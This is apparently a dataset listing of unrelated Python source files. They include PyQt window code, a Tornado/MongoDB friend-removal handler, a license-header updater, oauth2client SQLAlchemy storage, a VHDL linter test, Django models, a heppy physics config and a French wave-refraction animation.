frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
#Minimize and maximize methods for the new window action buttons
def minimize(self):
self.showMinimized()
def maximize(self):
if self.isMaximized():
self.showNormal()
else:
self.showMaximized()
def icon(self):
#Set app icon
app_icon = QtGui.QIcon()
app_icon.addFile('resources/icons/16x16.png', QtCore.QSize(16,16))
app_icon.addFile('resources/icons/32x32.png', QtCore.QSize(32,32))
app_icon.addFile('resources/icons/64x64.png', QtCore.QSize(64,64))
app_icon.addFile('resources/icons/128x128.png', QtCore.QSize(128,128))
app_icon.addFile('resources/icons/256x256.png', QtCore.QSize(256,256))
app.setWindowIcon(app_icon)
if __name__ == '__main__':
#Creating the QApplication
app = QtWidgets.QApplication(sys.argv)
#Set the main styling of the app
#Yes its all in this file!
with open("./appearance/style/stylesheet.css") as f:
theme = f.read()
app.setStyleSheet(theme)
#Misc stuff
window = Window()
sys.exit(app.exec_())
|
from tornado import web,ioloop
import os
from pymongo import MongoClient
class removeHandler(web.RequestHandler):
def get(self):
# GET THE URL DATA
userid = self.get_query_arguments("userid")[0]
friendid = self.get_query_arguments("friendid")[0]
#MAKE DATABASE CONNECTION
client = MongoClient()
db_livechat = client.livechat
usercol = db_livechat.user
#Query The DATA
frienddata1 = usercol.find_one({"_id":int(userid) },{"friend":1,"_id":0})
frienddata2 = usercol.find_one({"_id":int(friendid) },{"friend":1,"_id":0})
for i in frienddata1['friend']:
getid = int(i[0])
if getid == int(friendid):
r0 = usercol.update({"_id": int(userid)},{"$pull":{"friend":[getid,1]}})
for j in frienddata2['friend']:
usr = int(j[0])
if usr == int(userid):
ret0 = usercol.update({"_id": int(friendid)},{"$pull":{"friend":[usr,1]}})
frienddata = usercol.find_one({"_id":int(userid) },{"friend":1,"_id":0})
#Send the final result
self.write(frienddata)
|
import os
import sys
import re
excludePaths = ['\\.git',
'/gtest',
'/gmock',
'/qhttpserver',
'/qt5rpi']
def update_source(filename, oldcopyright, copyright):
utfstr = chr(0xef)+chr(0xbb)+chr(0xbf)
fdata = file(filename, 'r').read()
isUTF = False
if (fdata.startswith(utfstr)):
isUTF = True
fdata = fdata[3:]
if (oldcopyright != None):
if (fdata.startswith(oldcopyright)):
fdata = fdata[len(oldcopyright):]
#print("### DEBUG: '%s'" % copyright)
#print("### DEBUG: '%s'" % fdata)
# do count whitespaces
strippedFData = fdata.strip()
strippedCopyright = copyright.strip()
if not strippedFData.startswith(strippedCopyright):
print(" Updating %s" % filename)
fdata = copyright + fdata
if True: # test mode
if (isUTF):
file(filename, 'w').write(utfstr+fdata)
else:
file(filename, 'w').write(fdata)
else:
print(" File %s already up to date" % filename)
def recursive_traversal(dir, oldcopyright, licenseTemplates):
global excludePaths
fns = os.listdir(dir)
print("Processing directory %s ..." % dir)
for fn in fns:
fullfn = os.path.join(dir,fn)
skipFile = False
for rx in excludePaths:
if re.search(rx, fullfn):
print("Excluding %s" % fullfn)
skipFile = True
break
if skipFile:
continue
if (fullfn in excludePaths):
continue
if (os.path.isdir(fullfn)):
recursive_traversal(fullfn, oldcopyright, licenseTemplates)
else:
ext = os.path.splitext(fullfn)[1]
if licenseTemplates.has_key(ext):
licenseTemplate = licenseTemplates[ext]
print(" Processing %s ..." % fullfn)
update_source(fullfn, oldcopyright, licenseTemplate)
else:
print(" Skipping %s as there is no template associated" % fullfn)
templateCpp = file("license_template_cpp.txt", 'r').read()
templateQml = file("license_template_qml.txt", 'r').read()
templatePro = file("license_template_pro.txt", 'r').read()
templateSh = file("license_template_sh.txt", 'r').read()
licenseTemplates = {'.cpp': templateCpp,
'.h': templateCpp,
'.qml': templateQml,
'.js': templateQml,
'.pro': templatePro,
'.pri': templatePro,
'.sh': templateSh}
if len(sys.argv) == 1:
print("ERROR: No path provided")
sys.exit(1)
print("Checking path %s ..." % sys.argv[1])
recursive_traversal(sys.argv[1], None, licenseTemplates)
print("[DONE]")
exit()
|
"""OAuth 2.0 utilities for SQLAlchemy.
Utilities for using OAuth 2.0 in conjunction with a SQLAlchemy.
Configuration
=============
In order to use this storage, you'll need to create table
with :class:`oauth2client.contrib.sql_alchemy.CredentialsType` column.
It's recommended to either put this column on some sort of user info
table or put the column in a table with a belongs-to relationship to
a user info table.
Here's an example of a simple table with a :class:`CredentialsType`
column that's related to a user table by the `user_id` key.
.. code-block:: python
from oauth2client.contrib.sql_alchemy import CredentialsType
from sqlalchemy import Column, ForeignKey, Integer
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
Base = declarative_base()
class Credentials(Base):
__tablename__ = 'credentials'
user_id = Column(Integer, ForeignKey('user.id'))
credentials = Column(CredentialsType)
class User(Base):
id = Column(Integer, primary_key=True)
# bunch of other columns
credentials = relationship('Credentials')
Usage
=====
With tables ready, you are now able to store credentials in database.
We will reuse tables defined above.
.. code-block:: python
from oauth2client.client import OAuth2Credentials
from oauth2client.contrib.sql_alchemy import Storage
from sqlalchemy.orm import Session
session = Session()
user = session.query(User).first()
storage = Storage(
session=session,
model_class=Credentials,
# This is the key column used to identify
# the row that stores the credentials.
key_name='user_id',
key_value=user.id,
property_name='credentials',
)
# Store
credentials = OAuth2Credentials(...)
storage.put(credentials)
# Retrieve
credentials = storage.get()
# Delete
storage.delete()
"""
from __future__ import absolute_import
import sqlalchemy.types
import oauth2client.client
class CredentialsType(sqlalchemy.types.PickleType):
"""Type representing credentials.
Alias for :class:`sqlalchemy.types.PickleType`.
"""
class Storage(oauth2client.client.Storage):
"""Store and retrieve a single credential to and from SQLAlchemy.
This helper presumes the Credentials
have been stored as a Credentials column
on a db model class.
"""
def __init__(self, session, model_class, key_name,
key_value, property_name):
"""Constructor for Storage.
Args:
session: An instance of :class:`sqlalchemy.orm.Session`.
model_class: SQLAlchemy declarative mapping.
key_name: string, key name for the entity that has the credentials
key_value: key value for the entity that has the credentials
property_name: A string indicating which property on the
``model_class`` to store the credentials.
This property must be a
:class:`CredentialsType` column.
"""
super(Storage, self).__init__()
self.session = session
self.model_class = model_class
self.key_name = key_name
self.key_value = key_value
self.property_name = property_name
def locked_get(self):
"""Retrieve stored credential.
Returns:
A :class:`oauth2client.Credentials` instance or `None`.
"""
filters = {self.key_name: self.key_value}
query = self.session.query(self.model_class).filter_by(**filters)
entity = query.first()
if entity:
credential = getattr(entity, self.property_name)
if credential and hasattr(credential, 'set_store'):
credential.set_store(self)
return credential
else:
return None
def locked_put(self, credentials):
"""Write a credentials to the SQLAlchemy datastore.
Args:
credentials: :class:`oauth2client.Credentials`
"""
filters = {self.key_name: self.key_value}
query = self.session.query(self.model_class).filter_by(**filters)
entity = query.first()
if not entity:
entity = self.model_class(**filters)
setattr(entity, self.property_name, credentials)
self.session.add(entity)
def locked_delete(self):
"""Delete credentials from the SQLAlchemy datastore."""
filters = {self.key_name: self.key_value}
self.session.query(self.model_class).filter_by(**filters).delete()
|
import os
import unittest
from vsg.rules import if_statement
from vsg import vhdlFile
from vsg.tests import utils
sTestDir = os.path.dirname(__file__)
lFile, eError =vhdlFile.utils.read_vhdlfile(os.path.join(sTestDir,'rule_011_test_input.vhd'))
lExpected = []
lExpected.append('')
utils.read_file(os.path.join(sTestDir, 'rule_011_test_input.fixed.vhd'), lExpected)
class test_if_statement_rule(unittest.TestCase):
def setUp(self):
self.oFile = vhdlFile.vhdlFile(lFile)
self.assertIsNone(eError)
def test_rule_011(self):
oRule = if_statement.rule_011()
self.assertTrue(oRule)
self.assertEqual(oRule.name, 'if')
self.assertEqual(oRule.identifier, '011')
lExpected = [29, 35]
oRule.analyze(self.oFile)
self.assertEqual(lExpected, utils.extract_violation_lines_from_violation_object(oRule.violations))
def test_fix_rule_011(self):
oRule = if_statement.rule_011()
oRule.fix(self.oFile)
lActual = self.oFile.get_lines()
self.assertEqual(lExpected, lActual)
oRule.analyze(self.oFile)
self.assertEqual(oRule.violations, [])
|
from django.db import models
from apps.core.querysets import BaseModelQuerySet
from django.utils.translation import ugettext as _
from django.contrib.auth.base_user import BaseUserManager
from cities_light.abstract_models import (
AbstractRegion, AbstractCountry, AbstractCity
)
from cities_light.receivers import connect_default_signals
class EmailUserManager(BaseUserManager):
def create_user(self, *args, **kwargs):
"""
Cria e salva um usuario com os dados passados via kwargs.
"""
email = kwargs["email"]
email = self.normalize_email(email)
password = kwargs["password"]
kwargs.pop("password")
if not email:
raise ValueError(_('Users must have an email address'))
user = self.model(**kwargs)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, *args, **kwargs):
"""
Cria e salva um superusuario com os dados passados via kwargs.
"""
user = self.create_user(**kwargs)
user.is_admin = True
user.save(using=self._db)
return user
class BaseModel(models.Model):
""" Model base do sistema """
is_active = models.BooleanField(_('Ativo'), default=True)
created_at = models.DateTimeField(_('Criado em'), auto_now_add=True)
updated_at = models.DateTimeField(_('Modificado em'), auto_now=True)
media_path = ''
objects = BaseModelQuerySet.as_manager()
class Meta:
abstract = True
ordering = ('-updated_at',)
class Country(AbstractCountry):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("País")
verbose_name_plural = _("Países")
ordering = ['alternate_names']
connect_default_signals(Country)
class Region(AbstractRegion):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("Estado")
verbose_name_plural = _("Estados")
ordering = ['alternate_names']
connect_default_signals(Region)
class City(AbstractCity):
name_pt = models.CharField(max_length=200, null=True, db_index=True)
def __str__(self):
alternate_name = self.alternate_names.split(';')[0]
return alternate_name if alternate_name else self.name
class Meta:
verbose_name = _("Cidade")
verbose_name_plural = _("Cidades")
ordering = ['alternate_names']
connect_default_signals(City)
class Location(models.Model):
country = models.ForeignKey(
verbose_name=_("País"),
null=True,
to=Country,
)
region = models.ForeignKey(
verbose_name=_("Estado"),
null=True,
to=Region,
)
city = models.ForeignKey(
verbose_name=_("Cidade"),
null=True,
to=City,
)
class Meta:
abstract = True
class Schooling(models.Model):
level = models.CharField(
max_length=150, verbose_name='Nivel', db_index=True
)
def __str__(self):
return self.level
class Profession(models.Model):
name = models.CharField(
max_length=150, verbose_name='Nome', db_index=True
)
def __str__(self):
return self.name
|
import os
import copy
import heppy.framework.config as cfg
gen_jobs = 0
do_display = True
do_pf = False
nevents_per_job = 5000
GEN = gen_jobs
FCC = os.environ.get('FCCEDM', False) and not GEN
CMS = os.environ.get('CMSSW_BASE', False) and not GEN
if gen_jobs>1:
do_display = False
selectedComponents = None
if CMS:
# from heppy_fcc.samples.gun_0_50 import *
from heppy_fcc.samples.higgs_350 import hz_cms
selectedComponents = [hz_cms]
# selectedComponents = [gun_211_0_50]
for comp in selectedComponents:
comp.splitFactor = 1
else:
inputSample = cfg.Component(
'albers_example',
files = ['example.root']
)
selectedComponents = [inputSample]
source = None
if GEN:
selectedComponents = []
for i in range(gen_jobs):
component = cfg.Component(''.join(['sample_Chunk',str(i)]), files=['dummy.root'])
selectedComponents.append(component)
from heppy_fcc.analyzers.Gun import Gun
source = cfg.Analyzer(
Gun,
pdgid = 130,
ptmin = 0.,
ptmax = 10.
)
elif FCC:
from heppy_fcc.analyzers.FCCReader import FCCReader
source = cfg.Analyzer(
FCCReader
)
elif CMS:
from heppy_fcc.analyzers.CMSReader import CMSReader
source = cfg.Analyzer(
CMSReader,
gen_particles = 'genParticles',
pf_particles = 'particleFlow' if do_pf else None
)
else:
raise ValueError('not a generator job, and experience unrecognized. Set the CMS or FCC environment')
from heppy_fcc.analyzers.PFSim import PFSim
pfsim = cfg.Analyzer(
PFSim,
display = do_display,
verbose = False
)
from heppy_fcc.analyzers.JetClusterizer import JetClusterizer
genjets = cfg.Analyzer(
JetClusterizer,
instance_label = 'gen',
particles = 'gen_particles_stable'
)
jets = cfg.Analyzer(
JetClusterizer,
instance_label = 'rec',
particles = 'particles'
)
from heppy_fcc.analyzers.JetAnalyzer import JetAnalyzer
jetana = cfg.Analyzer(
JetAnalyzer,
instance_label = 'rec',
jets = 'rec_jets',
genjets = 'gen_jets'
)
from heppy_fcc.analyzers.JetTreeProducer import JetTreeProducer
tree = cfg.Analyzer(
JetTreeProducer,
instance_label = 'rec',
tree_name = 'events',
tree_title = 'jets',
jets = 'rec_jets'
)
jetsequence = [
jets,
jetana,
tree
]
if CMS and do_pf:
pfjetsequence = copy.deepcopy(jetsequence)
for ana in pfjetsequence:
ana.instance_label = 'pf'
if hasattr(ana, 'jets'):
ana.jets = 'pf_jets'
if hasattr(ana, 'particles'):
ana.particles = 'pf_particles'
sequence = cfg.Sequence( [
source,
pfsim,
genjets,
] )
sequence.extend(jetsequence)
if CMS and do_pf:
sequence.extend(pfjetsequence)
if FCC:
from heppy_fcc.analyzers.GenAnalyzer import GenAnalyzer
genana = cfg.Analyzer(
GenAnalyzer
)
# sequence.append(genana)
Events = None
if gen_jobs:
from heppy.framework.eventsgen import Events
elif os.environ.get('FCCEDM'):
from ROOT import gSystem
gSystem.Load("libdatamodel")
from eventstore import EventStore as Events
elif os.environ.get('CMSSW_BASE'):
from PhysicsTools.HeppyCore.framework.eventsfwlite import Events
config = cfg.Config(
components = selectedComponents,
sequence = sequence,
services = [],
events_class = Events
)
if __name__ == '__main__':
import sys
from heppy.framework.looper import Looper
import logging
# next 2 lines necessary to deal with reimports from ipython
logging.shutdown()
reload(logging)
logging.basicConfig(level=logging.ERROR)
import random
# for reproducible results
random.seed(0xdeadbeef)
def process(iev=None):
if iev is None:
iev = loop.iEvent
loop.process(iev)
if display:
display.draw()
def next():
loop.process(loop.iEvent+1)
if display:
display.draw()
iev = None
if len(sys.argv)==2:
iev = int(sys.argv[1])
loop = Looper( 'looper', config,
nEvents=nevents_per_job,
nPrint=5,
timeReport=True)
pfsim = loop.analyzers[1]
display = getattr(pfsim, 'display', None)
simulator = pfsim.simulator
detector = simulator.detector
if iev is not None:
process(iev)
else:
loop.loop()
loop.write()
|
import os
""" Programme qui fait évoluer des points représentatifs des crêtes d'un front
d'onde au passage d'une interface en modifiant la vitesse de propagation mais
pas la direction => le front d'onde change naturellement de direction."""
import numpy as np # Boîte à outils numériques
import matplotlib.pyplot as plt # Boîte à outils graphiques
from matplotlib import animation # Pour l'animation progressive
angle_incident = np.pi / 6
extension = 10 # Taille de l'image
c1 = 2 # Vitesse dans le milieu du bas
c2 = 5 # Vitesse dans le milieu du haut
dt = 0.01 # Pas de temps entre deux images
fig = plt.figure(figsize=(10, 10)) # Création de la figure
plt.ylim((-extension, extension)) # On met à la bonne taille en y
plt.xlim((-extension, extension)) # et en x
plt.plot([-extension, extension], [0, 0], 'b', linewidth=4)
a = np.sin(angle_incident) / np.cos(angle_incident)
y0 = 0 # La distribution des points commence en y0
dX = 0.2 # avec un certain écart horizontal (même ligne de crête)
dY = 2 # et un écart vertical (entre deux lignes de crête)
X = [] # Ensemble des coordonnées x
Y = [] # et y des points trouvés
while y0 > -extension: # Répartition de tout ces points
y = y0
x = -extension
while y >= -extension:
X.append(x)
Y.append(y)
y -= a * dX
x += dX
y0 -= dY
X = np.array(X) # Transformation en array
Y = np.array(Y) # pour faciliter les calculs suivants
positions, = plt.plot(X, Y, 'ro', markersize=5)
def init(): # Pas de travail particulier pour l'initialisation
pass
def animate(i):
# À chaque pas de temps, on avance d'une petite distance en x et en y qui
# va dépendre de savoir si on est du côté du milieu 1 (y<0) ou du côté du
# milieu 2 (y>0).
X[Y >= 0] += c2 * np.sin(angle_incident) * dt
X[Y < 0] += c1 * np.sin(angle_incident) * dt
Y[Y >= 0] += c2 * np.cos(angle_incident) * dt
Y[Y < 0] += c1 * np.cos(angle_incident) * dt
positions.set_xdata(X)
positions.set_ydata(Y)
anim = animation.FuncAnimation(fig, animate, frames=1000, interval=20)
plt.show()
os.system("pause")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.